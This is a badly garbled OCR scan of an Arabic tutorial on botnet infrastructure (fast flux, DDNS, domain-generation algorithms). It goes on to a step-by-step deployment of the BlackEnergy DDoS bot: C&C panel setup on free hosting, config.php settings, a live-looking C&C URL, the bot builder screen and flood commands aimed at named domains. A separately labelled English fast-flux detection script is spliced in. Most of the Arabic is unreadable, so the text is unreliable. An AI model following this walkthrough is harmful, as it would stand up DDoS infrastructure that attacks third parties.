J^i* ciliSj ;<x^joJI ^jjuj ^ j^l Bulletproof hosting AiLjaiJ ^j>» ^ILa jl j^j^j jl < jt > ^ 1 <> JjIj ^a .ujj^ 

J yr^JJ^ j^' ^ t> ^^tj Jll <Lj jjiJl^ t-Li^j^ jLai Bulletproof hosting ^L^J ^jj* McColo 
a1 jjjoixi 4£jJa3l ^jl .vfon <jl£ tdjlj jjjjJI ^jl j* AiLJaloal (jc J^ill ^j^^j .Kolya McColo < — * j^*-* s-^^a j a!aIj-<JI 

b( JI*1I J g&>ll j jj^VI ^J^ t> ^ J 70 J'j^ t> 

Dynamic DNS 

IP u' "domain name" $^ ^ J ^ Dynamic domain name service (DDNS) 

La li& .4-J (j^al^J! XP (jl J^^^^ J^*-^ (jC- Jaill (J^*^ CL-flJjJaxJl (JJ^ Jj ajLudVI J JjJ ^ jjuJ JjUaill ^jujI ^jl J*J li& .(C j^ 
^Lq 4L_jIsl!I ^Iaj 6C_JJjll ~ M ^ < Igjjj^j tillj Jlft t J jialt ^ ^1 j^Jl jl ixJajVI ^ J-axJ ^jl! (jA ^ ui^U JUaII JaJt I^A 

^jjJI ^SL jl 4 (FTP) ^laLJl J>jjjjj 

Dynamic Host Configuration Protocol (DHCP)-assigned IP address. 

DDNS^j *i 

;4_JU3I Cj jlaaJI ^ laaa jJJjl ^ DDNS C> '^liloj^U 

.DDNS ^ j> f J^Jl - 
.i «i » ™l t J DDNS 

^1 j^V ^l^Vlj DDNS c> ^Ulai^ a1±^ jll 

b c^jjSjVI ^j^ii J*^h ^ j DDNS 

DDNS^j^ J- 

tAImaJl ( n ^ jJl Jl 1^1<^.jj ^alJ <illk-<Jl (IP) CijjljVI <jjjLc <J j£ jj aIa^LujI S ^.1^>JI Jasu DDNS C>* J^ 
^Vl (3^*-^ LiAic- JU^II (jc (jj^J La Asul ^Akll oAA j tAIlnaJl djLi^^Jl c ^1 aIa^LujI J <j JJ-^I 4jUacj jLlLj 

;4_JL3l l_j j;i*Jl Jc ^JJ^J <j| ClljjljVI ^jI L ; UjUdJ 

No-IP's zapto.org ^ JliiJI J^ "2LD domains" ( c5ji^JI CjlaU^) .kiaa <^U^ ^Ua^ 

.l^iLuiSI 3Jj^oj Jj ^^jj Lui ^hopto.orgj 
.ajjjoi^JI jjjliiill jj t \:r' ; "\: DDNS 
aj^la (jj^ii (jl dj jJI (jla ;^L^L^)JI Iaa l^j .cJ^^I Cy* 5JaSj « ^ijJa^SI J ^iJ ^<»L^)j DDNS ( ; lllajj 

Fast Fluxing 

J ^jjuj (^1 ^jjoJI La ^Fast Fluxing ^ j» J jaLu^II t*l j^ill ^ t jiu^j ^Lj^» JjS c>» <ijj»^ ^ l^ 'Flux 
a^I jll " jaII" (jlkjll ^jojI Jj Fast Fluxing j^Aj -IP lP^^ t<!UJI J .dP^ jjj^^ ^j^-^l ^j^JI 

# a^.Ij (jUaj ^jojV a - ^ aSI Saa*1a IP (jjjLc 4_^iii3lj ,(j^ J ojjixld jp (jjjLc Jj 

.IP flux Lbj'l 4ijj«-4 Fast Fluxing :<lajal4 
Cjajll ^ja cilLj (RR) DNS c> lS^ ^ round-robin DNS c> > Fast Fluxing <i^5 s^l j aLjL 
jp ojjL^ (> 4^la jj ^ ^ ^lj ip jlj^ ^ DNS ^U^VI c> tSllij .s j^a time-to-live (TTL) 
"fault tolerance" LSa^JI ^ ^L^illj "load balancing" ^J'j^ JjVI ^11<JI J ^ ^'^"j round-robin DNS ;4Jajal4 
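As an added defender-side example, not code from the original book: round-robin DNS with a short TTL is also what a legitimate load balancer or CDN does, so a fast-flux detector has to combine indicators rather than alert on TTL alone. The Python below scores each queried name on the shortest TTL seen, the number of distinct A records returned over time, and how many different network prefixes those addresses span. The sample answers, the use of /16 prefixes as a stand-in for ASN diversity, and the thresholds are all constructed assumptions for this illustration.

```python
"""Fast-flux indicator scoring over DNS answer records (added defender-side example)."""
from dataclasses import dataclass, field
import ipaddress

# Constructed sample of A-record answers as a resolver log might record them:
# (queried name, TTL in seconds, answered IPv4 addresses). Not real data; the
# names and addresses are documentation / TEST-NET values chosen for this example.
SAMPLE_ANSWERS = [
    ("flux.example.com", 120, ["198.51.100.7", "203.0.113.42", "192.0.2.99"]),
    ("flux.example.com", 120, ["203.0.113.250", "198.51.100.88", "192.0.2.15"]),
    ("flux.example.com", 180, ["192.0.2.201", "198.51.100.133", "203.0.113.9"]),
    ("www.example.org", 3600, ["192.0.2.10", "192.0.2.11"]),
    ("www.example.org", 3600, ["192.0.2.10", "192.0.2.11"]),
    # Short TTL but every address in one prefix: typical CDN / load balancer.
    ("cdn.example.net", 60, ["198.51.100.20", "198.51.100.21", "198.51.100.22"]),
]


@dataclass
class FluxStats:
    name: str
    answers: int = 0                            # responses seen for this name
    min_ttl: int = 2**31                        # shortest TTL observed
    ips: set = field(default_factory=set)       # distinct A records over time
    prefixes: set = field(default_factory=set)  # distinct /16 prefixes (ASN proxy)


def summarize(answers):
    """Aggregate per-name statistics over a sequence of (name, ttl, ips) answers."""
    stats = {}
    for name, ttl, ips in answers:
        st = stats.setdefault(name, FluxStats(name))
        st.answers += 1
        st.min_ttl = min(st.min_ttl, ttl)
        for ip in ips:
            st.ips.add(ip)
            # /16 is a crude stand-in for "a different network" (assumption);
            # with ASN data available you would count distinct ASNs instead.
            st.prefixes.add(str(ipaddress.ip_network(f"{ip}/16", strict=False)))
    return stats


def is_fast_flux(st, ttl_max=300, min_ips=5, min_prefixes=3):
    """Heuristic: short TTL AND many distinct IPs AND spread over several prefixes.
    Any one of these alone is common for legitimate round-robin or CDN names."""
    return (st.min_ttl <= ttl_max
            and len(st.ips) >= min_ips
            and len(st.prefixes) >= min_prefixes)


def flagged_names(answers, **thresholds):
    """Names that score as fast-flux candidates, sorted for stable output."""
    stats = summarize(answers)
    return sorted(n for n, st in stats.items() if is_fast_flux(st, **thresholds))


if __name__ == "__main__":
    for name, st in summarize(SAMPLE_ANSWERS).items():
        print(f"{name:18} min_ttl={st.min_ttl:5} ips={len(st.ips):2} "
              f"prefixes={len(st.prefixes)} fast_flux={is_fast_flux(st)}")
```

On the constructed input only flux.example.com is flagged: the CDN-style name fails the prefix-diversity test and the plain site fails the TTL test, which is the point of requiring all three indicators together.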

.Fast Fluxing <> ^Ua

Single flux 
Double flux 
Single flux 

I^ji .AijlLxJI Sj^iU IP (jjjlic flux 4-Sjj^ J a^lA] ip ^jjjUc m A^. jiill s^tcj Aijl^ a\\ cjVI ^vimi single flux 4-Sjj^i 
j ^L* Jj cjULiJIj cA AkSI jj d^IcU ^ j£i flux-agents 6 ^ .flux-agents ^^^j j-^ *^lcl ^ I jj^ ikb 

i> j^jj M .fast-flux <^ Cj1£j^3 ^jiill ^j^xJI ^ Fast-flux mothership .fast-flux mothership ^ 
V mother ships 'Single flux J < qj > ;-»Wi motherships < J^jj .HTTPj DNS 

.DNS ^ 

J I jj ^jj V jj/^I^-aII c> 6 ^ cs^ u^j^l <£*L^ J .<-^-£&VI c> mothership 4_>U^J Flux-agents ^j*^ ^ 
'flux-agents & IP u' J^ ^^J^ ^ ^ c> ^ o^J <* J-^ ( <j > ^ .. i^ l J*i3l ^UJI jl mothership ^ IP ul j&> 

c>j flux-agents mothership ^ ij^ u j* > ^ l M f^Jj mothership Jj ^-A^ ^ f j 

J> 

-flux-bots USa/l (j-^ Flux-agents :4Jajal* 

cA&iJ* ^Ua ila .<jj>AI jajj flux-agents ^I^jujI jli t^jj^Ull JjS l^iLuiSI jl ^ mothership 
flux-agent ^ ^ j ^3 U-^-a tdiSjl! s j^a cj! jja ^ jl jaUj DNS ^->^U^ single flux 

m j3 jla JJC. jl <JalL ul ^aJ 

.flux.example.com ^ ^ J 3 ^ <-k**^ < Jliall li* ^ .single flux lookup lU^ ^£ JtAI JiSill jjjj 

Aikio jl "cache" ^>AI ^jjj^all J Ul *l <IALa *M^j J^ai-AI DNS *SW^^ jl JUiAl li^ ^ (j^jjij U jc^ 

liA j . (jiA j^ll ^jojI <a^.jA ^lill ^I^iLojVI ^l^aj JjjaLAI DNS jAj cJ^*^^ u!^ "zone information" ji^i 
example.com ij ^ ikb .flux.address.com c> IP u^j^ example.com ^ ^ 
^.l ^l^ki^U flux.example.com Jl^jl 1^ J^*J^ .bulletproof hosting c> yr*^* j u^h jj^V^ ^ jki^ 

J . jlj^U Sjoiia IP (jjjU^ ^ a^j^ij &jjjAj ^ flux.example.com .9 SjJ^J! J V^^jj ^ ^ IP ojj^ 

0^3 .< i^t (^jl^l ^ jjlU ^mothership j mothership Jj ^^l^VI jj ^j»j flux-agent '1 lj 10 ^ j^^^ 
jil j* (Jjjla ^-a^ll jl "phishing site" ■y^N ^il j^ c qj>>>luij jl£ lij ^aU. j tdijjjjVl a£jj^ Jc; ^j^ ^ e>Juc ^ jj^JI jj^j 




Double Flux i- 

"glue records" ^-j^?^ o^j 6 6 ^ l?^^ DNS (joJ i" double flux" 4j>j*0*^ ^j^A^ ^f^> J 

jjj l_i*Jj Aijii^xJI CjVI .^UjjujVI cJj> > >n ^jjA j,j ^ s-LgjoiVI IP ^j! jjc j& " glue records" j^^^ cj^^L^joj .cimkll ^jj>i jA3 
v mothership CP <> j^jUj^^ ^ J j^j^ I^jI ^jj US J jjjS jj>jj ^ i^UJ! IP j < authoritative DNS 



<xJ a^.J ^ J^l i Jliall liA J .double flux lookup ^ lU- ^UjS Jtill JS^I o^j .U^l DNS j HTTP J^Sa
u^j^ Aj^j t> ^ . jaL-^ cs^ 3 ) *J^' 6 ^ o^j 'single flux jljc- ^ 'flux.example.com o**j^ 

a^jj sjlcb ^ jll flux-agents JaSa c*1Lj l^jji ^bulletproof hosted ^U^VI aL^Ijj example.com *U^Vl 
(43 r 5 flux.example.com c> IP ojj^ (8 ^j 3 mothership ^ mothership J) (7 SjJaaJI) DNS cjUHi 

a£U* Aijjkj flux.example.com JL^VI I^j J^JI .J^LJl DNS J] flux-agents c> (9 SjJaaJI) dUjkJI 6 1a 

.JjLJI ^iSII J single flux J US 






[Figure: double flux lookup. Labels: example.com, mothership, Preferred DNS, flux.example.com, Client; lookup steps numbered along the arrows]



Domain Fluxing 

d^)LU Uj (jj^j^ll .bot agent W^jj^ ^ u**j^ cs - ^ a£jjuj ^jla ;<LUJI ^.I^^Vl UjIj US 

<Jja j& ^jj ^^jII o^j^ jll &^<JI .AlnaJI ciaLi^ ^j;^ *U3^ f ^ ^l^c] cjULq ^a jl bot agent ^ 

.C&C t> bot agent <iajJ jj ^Ia^VI cjUL jl CjU jl^Jl l-l* m ^ jl bot agent j £^ ^W*^ 

Aijj-a Jl c^^jJ U* 'C&C ^jU^. Jc I jjSjj jjSI gaJ L_fl jjuj 6^ ^ a Aili tCj jill ^S^jI] Cj jJI .liui C&C (j^S-aJ 

■C&C j J-^VI t> bot agent £^ C&C oj*j^l ^ a^W*^ U jlc jilj .cjIjjjjjII 
jjuj Ala <C&C JUa25U j u^j^ V bot agent .C&C <^^V SjjUl^l djluiill V 

# dj ^Jl ^Jjuj Sj laJ i u ^JU.j o^jlill ^Jj^aJ 

.I^aIaj LgAuS ^ u^i .C&C (J\ Sj^U« J^^S 4^jIj ip cjjjUp |> iVhhi bot agent :<QajalA 

qjjaLai ^ jjoj j j^U i*uWi tjte. J jj^a^Jl SjjSSl I^jJ (JjjJ bot agent C&C ^-jVl^ajVI ^iaa ^J^aj 

bot agent jU^» ^ U*^ jlS U^x» j . JxilU ^ j o^jll Uc^ ^1 IP ojjUc^ jl jj^ j^ll ^l^klujU C&C J^jVI 5J jU^ ^ 

j-ol jVl JUjV Al AjjouIU Aijjia ^.jJ V -UV dl jJ! ^Jjoj jll I^A Jx^J US .C&C J^ 3 ^ J^^ UJ^ ^ 6 ^ 

.bot agent cl^j^^ J aj^JI 

jl ^jjjSjII cjliLi ^^ic ^UicVI (jj^ (Jaa j^ll ^l^cj ^ <j^aUJI a bjSal\ bot agent clA^j 

.DGA ^S^ liA J*^ c#^^ ^cr^^ .domain fluxing ^hr^ j cj! jji J^ cjjJI JjS 
jll I^j (J 1 gai^yi Jc liijlj ^ jl*-<» jjjc. (jlS-<i JUllj a^jjjoixJI cjI^a A\ Ua^ ls'^ u^^^^ L>^ (J^ 1 DGA 
^jUJU Jl > ^il^U B AjalijVI j .(jj.Vu^l Jia ^ia ^jj 1 $ jjS jj ^jc Jll j Aiajj^JI Ula B J^^^ J A J^^^ 

J djjjuxiSI CjUaLaJl (jV Ujj 6(JasU Asu ^aJ ^alajVI ^)! JU J (jSlj ,L_flj| j^Jl ^alajl ^j-d A_Ajla ~\ iklLujl J CjI jIuj Aau A 



a1 jJ3 a l^jl^ a\\ a kY\\ a a*U\a a1 jl^xi mL5 L LftS A <^-?^ ^* l>* ^ ( . 1 >J C5-^ c_ iUuL^lH ^ aJL^JI

5jujVI 4SjVl (j^j *\ ikU j 4L_fljl^JI ^aj ^ JjVl ^^531 4SjVl 900 j 800 u£ ^J^' ikU j 4<ajjjuiJI ^jUsJI ja^ *j 

[Available Area Codes] - [Number between 800 and 900] - [Constant Last Digits, e.g., 5611] 

^aj L-ALaj ^5 A ^ j^-^ ^J' U' clH^ J J^^^ c^cLjaj j J jVI 4351511 ^ISjiU o^-a-a JLuaJ 101 ^ ^jj^ 3 ^ 

.(J^A 3 tj^^ (j -0 ^ j^ 1 ^^ 
^ jjlS ^t^h ^ tC&C .A urh^\ ij'^ bot agent c> 

J CjUuIxjII d^A L_fl^)XJj .C&C (Jlj^a^VI aJjL^xJ ^LdjJl tillj ^I^JjujI ^aJ (j-aj fi^Aa^a CjI <liLlJ (^^ic pLb ^Ldj^ ^UujjI ^ ^•j^kll 

DGA 

£>i& (j^i ^^joujjII ^jia^iJ! .djJt .iluj Jja ^ Ia jJij ^jj c _^j3I bot agent j» ^ uj^^ ^W^j^^ is* * \i A * ^ ^ j& DGA 
<s* o^j^ ^Ldjujl a alia a <c o ^cjjj DGA t^lc- .C&C ^ cJ^^^ I^I^jjojI bot agent ^ > "j c^^j u^j^ ^^^^ ^ 

u^j^^ t> 250 5^ Conficker.B DGAj Conficker.A DGA ^ JUJI ^ .^Ijl! ^jJI 
t> 500 JaSa e ^ia£i l^jli tCjlilk^l ^ t> j jjiJl jSlj tL^jj ^j^l! ^U^i <> 50,000 ^ Conficker.C DGA 

.Conficker.C 

CjUIaP (jAuajj ^121 CjI ajW*i1I (j-<a a £ujj l^JI 

Domain Fluxing 

Jjijjuj ^5^) j^c. jjuJ! <ajU3I l^jfll kiajj CjUijj c ^j3I "Domain" ^L^VI cjlilkj .^b jjoJI ^Ajlill ^ ^ n 

^4_LaJ! ^ixij^ll pUijajl 18 cl>^ jffi ^ Conficker ^^^^ cjljjiiiLJI ^jli tJllxJI 

.^11 C&C 

domain reputation systems 5^Jaj| jli ^UlUj ^jll ^> s s jial Ja^a l^l^kl^lj <il^L^ ^ ^Jjj 

.^A^jJa o^jlill ^Lgj^c (jj^J 

Domain Fluxing is ^ 

c^cjtnll (jjoii] ^.iJa^j DGAj t4lSaUJ!j *^ ja. ja ^ISjVl c> ,^ ui ^illj A is^^ ^ Clbau] DGA 

'u^^ cl>^ j 'NXDomains £y* a]&& ^ DGA .U^j^ cl^ ty* djU^£ ^cjjj ciijl£ bj ^aLk 

.jj^j^ jjp o^j^/J^j ^ju NXDOMAIN :Aiajal4 
^>ni j .DGA ^ ^iLkUl JUcVl j t*lli (jAJ AV Jaliill ^Bot Agent is* DGA uj*^ ^ ^ >^ 

<laj grj^j'" j sinkholing ^ j^^^l l_a^suj , JJaJill ^aLaJI ^LaJ! AiscaJ tilli asuj ^jj-dj^ll tilti - ^ 

:Luaj| lj jjp Sjp DGA ci^ 

DGA-capable malware ^j^j ^l^V jSaj j t^Ub jJaW ^> j^SII l_iW5 DGA ^ NXDomains 

J j^ »» i^ l Jjjj ^1 CjlaUaJI J^ij J^U. c> CjIjjjjjII s jia^JI ^> 0^^^ u^ 2 malware 's DGA component 

.sinkholing c^j j^ 5 c>j 






dl jS\ fk*A m k^^A\ jUj^JI CjIa^a j ^Phishing attack" \:>^l dU^j* j ^ J*3I Ajj^I l>* *gr^ f^^s3 j^l ">»n 

dl j^VI ^)&^l J^' < — * J -^'l--^ (J-at^C-VI I^I^JjojV dl^UaxJl ^^G^Lal pb JjoJI (JjjuJI ^Uj dlJJ jA\ 

lgic« (jlx-a J;iiJl dlj^VI (j-a J^-*^ ( * w ^ L-lau ^11 (j>» dlj^VI £>i& (jl Jaak^lj (jl t . la>J (j^Jj t4_^LaJ! ^^^ic ja. j-<Jl 

.(jl*-* ^li-ll 4_Lgj (jl*-*!! 4_Laj 1 V J-^u V 6^)JJ^ dlJJ ^Jl dlj^l .<LgIxI3 (jla^su Vj Ja^a a (jj^J C5"^J 

<J-a-d} ^^-^-i ^>^l ^ j->gll cJSU -C5 ^.jL^. c ^jjJa^o ^gJc. jl (jjJC jjuJI ^jj-d^JjouJl S^G^' ^gic C&C r*^3 ^ ^juilj^Jl 6 ^ <^ 

liA ^ .Hamweqj TDL Botnet 'Zeus-based Botnets -USJ lU^j .^L-aiall ^ < a*jjal l Jati2 

(j!>Lk .d jJI (jx» 6 JJT \ s\ J J^-J J^J^ dLjV ^r^J^I ^1 g-LuJ ^aJ .dlJJ jJl (j^-J J." 4-^-^] 4)\aC* 

dtj jJj^)31 £>i& (JiLd pUj (j-a (jla^iJl j^ll ^a <J^j (jxi dtj jJj^)ll ^Ladj dlpl^^J j dl jjn^ t <i>^i j] L-l&ij L_fl jjoj AJUll djlj^ill 

4^l^o .^iixiill q^\jc>^ J-gI£3U J jj*-* jj'i^ ^ ^.1 I^a jjajj q\ ^j£U3I ^gJtjjjj .^^Lkll jl^VI ^ > Ig^hVi 

.DDoS ^ jVl HTTP cjlc- ^ j BlackEnergy Bot Ulj^i ^ 

BlackEnergy Bot 

jjjiajll cjjj o^a d^l£ j .pi jjll ^1 jjiuj ( » : ijaj ^ l^a. ^Ln^ jS^VI j^3I CjIa^J Cj jj jj£I jl£ BlackEnergy 
^jjoj jj] jIj^^jjojU t fll t o^j^. CjI Cj jJI 11a jjiaj .Darkness bot (UL^JI 1 (jc ^jI jl<» ^^ic Ia^. djjjlajj 
(j-<i ^cjIo dj jJI li^ (ji ci iijuj£ ^^jll j (C&C) o^Uall ^a^LkJ jj^JI ^^>^- l!^ 2 ^ uj^j^j ^ j^^j^ uj^y^ W-^^j^ 

-c ^jujj^)3I Cljjljyi ^ajl^J pb JJoJl (JjjoJI 

U£^j t\ Vqjq^l cJ^-^- il^^.j-G .^4^ ^1 ^<JI L-fll^Loal 6^j| Ja^ jl A3 j 4_xiJLiJl (j>j (jLd^pJI Cjlj^a (j-o <c j±Ld <c ^ ^ dj jA\ 11a 

^Uj jLi^ ^ C5^3j '^^il Aij^uJI cj! jl^aVI (jj^^c ^^ic (^Ij 'BlackEnergy ^^1 dljjl <c ^ ^^Jc J jj^a^JI ^ 
toolkit -SI 1^ ^ "anti-debugging features" gj^ > ^1 lU^j AV jj^ 3 polymorphic binaries 

l^Ld 6j^Ja fibVI i>i& .dULlJl S^C-li diUaixLxi Jia l& JJC. j dj jill ^^ic Sjlnj>n\\ PHP scripts (j * > ^aJJ ( ^j3I j dliLJl (j* <C ^ £a
.^b jjoJI (JjjoJI j!^. (j* l^ilc jj^^JI (j^-ftJ j (jVI <^.LaJl ^^ic l^J dlLcai j 6 j3 jj£I 4 ^ uoj 

BlackEnergy ^jujI ^2 Jl jikl 4_iLc^ ^ <!IL» 
http://threatpost.com/blackenergy-malware-used-in-attacks-against-in

"Setting Up the Command and Control Server" C&C ^ ^! :1 Sj^t * 
pL^V ^ .C&C PHP ^AiL> ^ul JxilU cUu MySQL j PHP 'Apache ^ 

L_fl jjoj Lo I^Aj tilLlA (Jxij .SQL I^ILujI J Uj^I dlj jA\ dj!^jaj lai^J (jl 4jLuj (j-d (JjA^.j (jjiflail] dUUj o^cla 

^Ia^LujI ^aJ (j-d j Jxil^llj L_flJjJaxJl ^Uj jl A-ljl ^ a\\ AiLjaVI ^1 AjlxJjojVU ^a jfii (jl Loj (jjjkj^la cilLiA t <>J>>i^ pLodV 

Uj^J U£ ddns 

.^kVI (jc <L^)]all JjJaflJj LI j>Jl (jx» AjAslSI ^jjj ^31 J dljjljVI ^^ic 6j3 j2>Jl ^-ijl^xJl AiUiaVI ^1 (j* J^^l 

j> https://www.eb2a.com :^iU^yi ^1 ^ <Jial (> .Apache jMySQL j PHP ^l^i^l £ 

http://www.hostinger.ae 

jai (j^aLkJl ^aall ^-JiiLJii ^1 L_jl&i3lj ^a jlj .ciL (j^aLiJl L-flJjJaxJl dUUj jLaJjU ^ ^<Jl ^aj^J L_fl jjoj <Jj^ > all I A-il^C (j-d pl^ljVI AxJ 

i^Vl^ uj^ ^Ij <al^VI 
[Screenshot: hosting control panel home page (announcement banner, function search box, Preferences, Redirects, MX/SPF records, e-mail tools, phpMyAdmin)]




/U13II 3-^Ui3l UlSis ^jIIj MySQL ^1 jS C5 1& jiill J^lk c_13ij cjUUj s^&IS ^L^L c_i jjuj Vji 




[Screenshot: control panel "MySQL Databases" page with the "Create new database" form]




Create Database <ija j& botdb o^j ^.vli^ ^1 J*.^ 




[Screenshot: "MySQL Databases" page after creation, listing the new database (name ending in _botdb), its MySQL user name, host name and a phpMyAdmin link]
Admin ^ V jl jSj-L ^ ji-a * yi Vv*^ j toolkit ^ ^ s >^





[Screenshot: phpMyAdmin structure view of the new database (Structure / SQL / Search / Query / Export / Import / Operations / Routines tabs): "No tables found in database", with a "Create table" form]



;aJU3I ^ ^ j^VI 3-*jUi Import cjj^ ^ 



[Screenshot: phpMyAdmin Import tab: "File to Import" with a Browse button, character set utf-8, partial-import options, size limit (Max 300MiB), SQL compatibility mode NONE]



JLojI go jjll ji^U f jSj db.sql <-— ili <•— ai* j& j s^tall ^jjja jSl t-tlli j Browse 



[Screenshot: phpMyAdmin Import tab after the upload: "Import has been successfully finished, 3 queries executed. (db.sql)". The echoed SQL shows "Table structure for table 'opt'" with columns `name` varchar(255) NOT NULL and `value` varchar(255) NOT NULL]

jjeta (jja jajII ^ j ^LlojjjjII ^aall 
[Screenshot: phpMyAdmin structure view listing the tables created by db.sql, with Type and Actions columns]



tOOlkit UJ^ yr^ php ^-iUL lai^JaJ ^ jij cilli Axj .<Lkl^J ^1 djUUl ^^a^ cJi^j htdOCS ^V*^ <-5 U^' (»J^ 

.Zip lafcJal l (JJ^J 



[Screenshot: Windows Explorer window for the toolkit folder ("Black Energy" on a removable disk) listing auth.php, cmdhelp (HTML file), config.php, index.php, MySQL.php, stat.php and style (Cascading Style Sheet), next to the host's web file manager at Directory Tree: root /htdocs, which reports "This folder is empty" (Directories: 0, Files: 0 / 0 B, Symlinks: 0)]



4_uiLui3l Jj^-la l£^JH C5"^J 




[Screenshot: web file manager "Upload files and archives" dialog (upload to directory /htdocs; archives in zip, tar, tgz or gz form; notes on the upload size limit, the 30-second execution limit, automatic ASCII/BINARY mode detection and overwriting of existing files)]



.a/ 4^^1x11 ^jja jii ^ii Ja jkjja*l\ t aLdli ^l^o aj^j] browse c3j^ r» 
[Screenshot: browser showing the file manager index.php after the upload; status bar: 100% Script finished in 0.21 seconds]
[Screenshot: web file manager, Directory Tree: root /htdocs after the upload, listing MySQL.php (513 bytes), auth.php (1505), cmdhelp.html (1517), config.php (309), index.php (5379), a seventh entry of 987 bytes whose name is unreadable in the scan (stat.php by elimination) and style.css (807); Directories: 0, Files: 7 / 10.76 kB, Symlinks: 0]
.Chmod ii> jfcll f3 c^LJI jUikU ^ j config.php <j-«UJI permission ? j& 



[Screenshot: file manager "Chmod directories and files" dialog: Owner / Group / Other read, write, execute checkboxes, a "Set all permissions" button and the Chmod value field]



.666 permission j^? ^ 
.edit cb* jfcll f3 d jUlkl config.php ^ ^ uVI 



[Screenshot: browser window with config.php opened in the file manager editor]



£jJaj JjVI ^ Cilia AiLjalajVI ^3 J* L-bud^ ^^ic t flllkj C5"^J Config t 4*jJa ^ J^j tfljlm AjLujU <J^-^ 
[Screenshot: file-manager.hostinger.ae/index.php, editor (Normal textarea), File: /public_html/www/config.php, Status: This file has not yet been saved]

// (garbled comment in the original)
$opt['mysql_host'] = "mysql.hostinger.ae";
$opt['mysql_user'] = "u760356295_botdb";
$opt['mysql_pass'] = "**********";
$opt['mysql_base'] = "u760356295_botdb";
// (garbled comment in the original)
$opt['admin_login'] = "root";
$opt['admin_pass'] = "toor";



^jlJ j .aJUII aJL^\ kia auth.php < aUll ^ jL*JI ^ cAjjjaJI 4_>U1> ^jI> jJU ^UJI C&C ^ ^ jj* 

http://drmohammedteba.890m.com/www/auth.php



[Screenshot: browser at drmohammedteba.890m.com/www/auth.php]




jl MySQLj PHPj Apache i> l£ c^ib idlilj 4> ^UJ! jl^JI ^ JA^b ja ^121 aSjjUI 
https://bitnami.com

jj jl jit <li=^ uj ^ (j-o j DDNS ^l^c-V cJUl<JI Jjijjoj Jc no-ip J Jj> > iuIU ^ jij ^l^VI a»j ^5 AiLuJ! 
J5Lk <> ^1 j >V j2 j! Jl c> ^1 j PORT FORWARDING ^ 



[Screenshot: XAMPP Control Panel v3.2.1 (Compiled: May 7th 2013): modules Apache, MySQL, FileZilla, Mercury and Tomcat with Start / Admin / Config / Logs buttons; log pane:]
10:29:28 AM [Apache] Attempting to stop Apache (PID: 1924)
10:29:29 AM [Apache] Status change detected: stopped
10:29:29 AM [mysql] Attempting to stop MySQL (PID: 9356)
10:29:29 AM [mysql] Status change detected: stopped
10:31:02 AM [mysql] Attempting to start MySQL app...
10:31:02 AM [mysql] Status change detected: running
10:31:19 AM [mysql] Attempting to stop MySQL (PID: 2112)
10:31:20 AM [mysql] Status change detected: stopped
10:40:35 AM [main] Executing "c:\xampp\



[Screenshot: phpMyAdmin, SQL tab: Run SQL query/queries on server "127.0.0.1"; databases information_schema, mysql, phpmyadmin]
uV statphp PHP ^ ^ POST e !^L,U l^i e j£ cjjJ! s tat J J *^ J 

.(^U3I j^l) j ^Jaj^ill CjjJI ^ ^^xJ AjjL^a^Vl CjUUJI jjs jj Sj^lS J^lalll "time" 



[Screenshot: phpMyAdmin browse view of the stat table: a column of bot identifiers, each followed by the same build identifier]
C&C php file Jj^^"; tdjUUJI o^clS ^Uijj ^su 
f3 c>j Apachej PHP J^-^ c5^^ s^j^^ 

(ibj'j MySQL ^ config.php ^ 

(_^jljj (jC (jLalJ ^^^jll (J j^^Jl (Jj^jujJ 4_jujLuj (^^Jc (Jj^aaJ 

J ^ .config.php ^ ^jljll o^j^^ 



"Preparing the bot for the Client" J^t ^ ^\ :2 Sj^l * 
J^ll) .bot executable J ^ -> ^ Jj^I ^ ^ ^ ^j^ cjUi^xJI ^Jjj s >^JI ^ J 

.(BlackEnergy Bot >j 
C5 £jiij jl C5 Joiij Vj .C&C DNS ^ ^ UU*jJaj ."Host/f^^" j& ^ W^-^j ^ ^-iuujjII

CjUUJI ^j^Ij ^ jfc L^jI "http://drmohammedteba.890m.com/www/stat.php" ^ ^ ^ stat.php J-^W 
c> j^ii ^IS ^ cjjJI ciljLJl fjSlI £^ U ."f/se polymorph exe" j "t/se cry/?f traffic" J aLIUI ^j^V! 

jjaxjJaluaxll" Qiqu^i^ll AjL^aV jj^tluax (jVI j liiiill Jjta dj jJ L_flL ^Ujj ^jj '"Build" jj^ (Jj* 




[Screenshot: BlackEnergy builder: HOST (http://somehost.net/stat.php), Request rate (in minutes), Build ID, Default command (if can't connect to server), ICMP Freq / ICMP Size, Syn/Ack, SYN Freq, HTTP Freq, HTTP Threads, TCP/UDP Freq, UDP Size, TCP Size, Spoof IP's (1 - ON; 0 - OFF), checkboxes Use Socks5 / Use crypt traffic / Use polimorph exe and antidebug, Execute after N minutes (0 - execute immediately), Outfile _bot.exe, Build button]



"Implanting the bot to vulnerable hosts" p\i**al\ uth'^ £jj :3 SjkkJ! J_ 

c ^j3I j (j-a ^1 jVI Jl^U j command ji^nti 5-^Ui3l ajI^j c_u^ diii jJU 4 > ^11 3_JjUi J!>tk ^ t^lli j 



[Screenshot: browser at drmohammedteba.890m.com showing the C&C statistics page:]
total bot's: 0
bot's per hour: 0
bot's per day: 0
bot's for all time: 0
Botnet Commands

jjjjj ^ .ajuouj jll ^IjjI 4J1 ^Jj J^axJI cjjj ^ reverse- engineered CC code 

j ULkj J^U .4^ j J! <iI3U ^>J1 o^J ^l^uJ! cmdhelp.html j README.TXT ^AiLJI ^ ^ j*' jVl 

.^aljVl ^g£j U jCO ,6.1c. Lola! 1 CjliLa 1 g LjJ jJ ^JJ ^aJ ^^jll 4 cilU& <jt tj^iajl 

Flood:

^ ^ jj ^jc Cj jJ! ^LujjV j-^Vl l^gi CjUAl-<JI , CjULjajiill d iLa^a (j-G 3 alia a ^1 ji\ S^c cj jJI lS^c- flood j-*^ 

- ICMP
- UDP
- SYN
- HTTP
- Data

flood syn www.abc.com 25 #10#

:80 ^1 TCP SYN cjUL^iall iiiiil Cj jj Jjy^J cjUuL^I JL-jU ^liJI f lJ 
4500;2000;100;1;0;30;500;500;200;1000;2000#flood syn mail.ru 80 #10#xEN-XPSP1_80D1F15C

Stop:

mLyiJ ± cjUU^iil Us&Jl bot client stop 

Die:

>(JJJJ JI 3Jaj^l ajLJI API ExitProcess ^^-j .l_jL^JI ^Ikdl ^> ^aij cJi^J bot client ^ die j*VI 

Open:

Iajj jl Ajiull <LU1I djliLJI (Jaa^j] a.^lnn ^jl (j^-dj ^>*V1 I^a ^jl bot client lS^^ lH^j .l3^ ls* ^ 

Wait:

^ Sjja Asu s^iu^JI j-oljVl J^l C&C JL^aj'Vlj laUij ^LSII qj± duj^al! ^ I jsll ^ bot client liA 



Architecture of the Botnet:
